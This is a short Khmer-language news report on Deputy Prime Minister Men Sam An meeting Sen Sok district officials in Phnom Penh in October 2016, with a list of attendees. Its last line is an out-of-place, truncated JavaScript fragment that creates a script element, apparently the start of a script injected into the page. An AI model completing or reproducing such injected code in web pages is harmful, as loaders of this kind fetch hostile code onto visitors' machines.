លោកជំទាវ ម៉ែន សំអន អញ្ជេីញចុះសំណេះសំណាលជាមួយក្រុមការងារថ្នាក់ជាតិ ក្នុងខណ្ឌសែនសុខ
ភ្នំពេញ៖ នៅថ្ងៃទី ១២ ខែ តុលា ឆ្នាំ ២០១៦ វេលាម៉ោង១៥,០០នាទី លោកជំទាវ ម៉ែន សំអន ឧបនាយករដ្ឋមន្រ្តី រដ្ឋមន្រ្តីក្រសួងទំនាក់ទំនងជាមួយរដ្ឋសភាព្រឹទ្ធិសភា និងអធិការកិច្ច និងជាប្រធានក្រុមការងារថ្នាក់ជាតិចុះជួយរាជធានីភ្នំពេញ បានអញ្ជើញជួបសំណេះសំណាលជាមួយក្រុមប្រឹក្សាខណ្ឌ គណៈអភិបាលខណ្ឌ មន្រ្តីថ្នាក់ដឹកនាំ ក្រុមប្រឹក្សាសង្កាត់ និងមេភូមិ នៅសាលាខណ្ឌសែនសុខ ។ អញ្ជើញចូលរួមក្នុងពិធីនោះដែរ រួមមាន លោកជំទាវ ម៉ក់ វណ្ណស៊ីថា អភិបាលរងរាជធានីភ្នំពេញ និងជាតំណាងដ៏ខ្ពង់ខ្ពស់ ឯកឧត្តម ប៉ា សុជាតិវង្ស អភិបាលរាជធានីភ្នំពេញ ឯកឧត្តម ម៉ម ប៊ុន ហេង លោក បុឹល កុសល គណៈអភិបាលខណ្ឌសែនសុខ នាយក នាយករងរដ្ឋបាលខណ្ឌ លោក ម៉ក់ ហុងអធិការខណ្ឌ លោក ព្រំ កក្កដា មេបញ្ជាការមូលដ្ឋានកងរាជអាវុធ្ត្ថខណ្ឌ ប្រធានការិយាល័យចំណុះ ជំនាញខណ្ឌ និងសមាជិក សមាជិកាជាច្រើនទៀត ។
var d=document;var s=d.createElement(‘script’);